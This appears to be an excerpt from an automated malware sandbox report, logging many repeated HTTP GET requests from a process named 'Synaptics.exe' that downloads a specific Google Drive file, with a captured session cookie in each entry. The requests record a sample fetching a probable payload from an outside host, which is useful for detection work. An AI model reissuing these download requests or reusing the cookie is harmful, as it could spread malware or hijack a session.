                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
                                Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cacheCookie: NID=520=TGWBJBLIp_8rmWNOnD08JMSTh549RjrLgUnKhcscmaOG2M07zBtkMmktLGcLvH_w4tDPvw448qHMmjCN503LAFY0Qw5jkncdTQcISct4dpI8x5zsG-zBLdB7M2pyAQVH9jMHkK1Qc57vmy-q8atE6gUZdBGq4RnbS2ebm4nFE5ux3MecvXLyXcOy
